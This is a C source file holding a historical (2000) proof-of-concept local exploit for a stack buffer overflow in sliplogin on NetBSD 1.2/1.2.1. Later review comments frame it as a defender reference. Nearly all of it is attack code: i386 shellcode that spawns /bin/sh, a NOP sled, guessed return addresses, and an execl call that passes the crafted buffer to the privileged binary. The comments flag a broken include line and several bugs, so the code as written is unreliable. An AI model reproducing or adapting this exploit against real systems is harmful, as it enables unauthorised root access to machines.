/* Coded by: humble of Rhino9 sliplogin buffer overflow for netbsd 1.2 1.2.1 */
/*
 * Historical (2000) proof-of-concept for a stack buffer overflow in
 * sliplogin on NetBSD 1.2 / 1.2.1, triggered through the program's first
 * command-line argument.  It is the textbook layout of the period:
 * NOP sled, machine-code payload at the tail of the sled, then a run of
 * guessed return addresses.  Kept as a reference for defenders; the
 * mitigations that break this pattern (non-executable stack, stack
 * canaries, ASLR) are exactly what later systems added, and the releases
 * named above are long obsolete.
 */
/* NOTE(review): the two header names were lost in extraction, so this line
 * does not compile as written.  From the calls below (printf, atoi, malloc,
 * exit, memset, strlen, execl) the originals were presumably <stdio.h>,
 * <stdlib.h>, <string.h> and <unistd.h> — confirm before rebuilding. */
#include #include
/*
 * Opaque i386 byte string; the embedded "/bin/sh" literal makes its intent
 * clear.  The bytes are deliberately not annotated here.  The trailing
 * \x01/\x02/\x03/\x04 groups look like placeholder slots the code patches
 * at run time (the earlier `\x89\x5e\x0b`-style stores) — not verified.
 */
char shellcode[] =
    "\xeb\x23"
    "\x5e"
    "\x8d\x1e"
    "\x89\x5e\x0b"
    "\x31\xd2"
    "\x89\x56\x07"
    "\x89\x56\x0f"
    "\x89\x56\x14"
    "\x88\x56\x19"
    "\x31\xc0"
    "\xb0\x3b"
    "\x8d\x4e\x0b"
    "\x89\xca"
    "\x52"
    "\x51"
    "\x53"
    "\x50"
    "\xeb\x18"
    "\xe8\xd8\xff\xff\xff"
    "/bin/sh"
    "\x01\x01\x01\x01"
    "\x02\x02\x02\x02"
    "\x03\x03\x03\x03"
    "\x9a\x04\x04\x04\x04\x07\x04";

/*
 * Return the current stack pointer, used as the guessed address written
 * repeatedly at the end of the buffer.
 *
 * There is no C `return`: the function copies %esp into %eax and relies on
 * %eax being the i386 return register.  That is undefined behaviour in
 * standard C (missing return in a non-void function) and only worked with
 * the compilers of the era; a modern optimiser may discard the result.
 */
unsigned long get_esp(void) {
    __asm__("movl %esp, %eax");
}

/*
 * Build the argument buffer and hand it to sliplogin as argv[1].
 *
 * Non-standard `void main`; should be `int main`.  argv[1], if present,
 * is an integer "delta" added to every size below.  It goes through atoi
 * with no validation, so a negative or very large value makes the sizes
 * wrap and the memset/copies below run outside the allocation.
 */
void main(int argc, char **argv) {
    char *buf, *p;
    unsigned long *adr;
    int i, off;

    if (argc > 1)
        off = atoi(argv[1]);
    else
        off = 4;                       /* default delta when none is given */
    printf("using buffer delta:%d\n", off);

    /* Layout: 2268+off bytes of sled, 28 bytes (7 x 4) of addresses, then
     * a NUL terminator.  NOTE(review): malloc reserves 2268+28+off bytes,
     * but the terminating `*p = 0` below lands at index 2268+off+28, one
     * byte past the end of the allocation (off-by-one heap write). */
    if ((p = buf = malloc(2268 + 28 + off)) == NULL)
        exit(-1);

    /* 0x90 is the i386 single-byte NOP; fills the sled region. */
    memset(p, 0x90, 2268 + off);

    /* Place the payload so it ends exactly where the sled region ends.
     * strlen() is re-evaluated each iteration; harmless here but wasteful. */
    p += 2268 + off - strlen(shellcode);
    for (i = 0; i < strlen(shellcode); i++)
        *p++ = shellcode[i];

    /* Seven copies of the guessed stack address.  Cast is to `long *`
     * while adr is `unsigned long *`; same width on i386, sloppy elsewhere. */
    adr = (long *)p;
    for (i = 0; i < 7; i++)
        *adr++ = get_esp();
    p = (char *)adr;
    *p = 0;                            /* terminate so execl sees a C string */

    /* Replaces this process; only returns on failure, which is not checked.
     * The variadic terminator should strictly be `(char *)NULL`.
     * For defenders: a sliplogin invocation whose first argument is ~2 KB
     * of mostly 0x90 bytes is the observable artefact of this PoC. */
    execl("/usr/sbin/sliplogin", "sliplogin", buf, NULL);
}
/* www.hack.co.za [2000]*/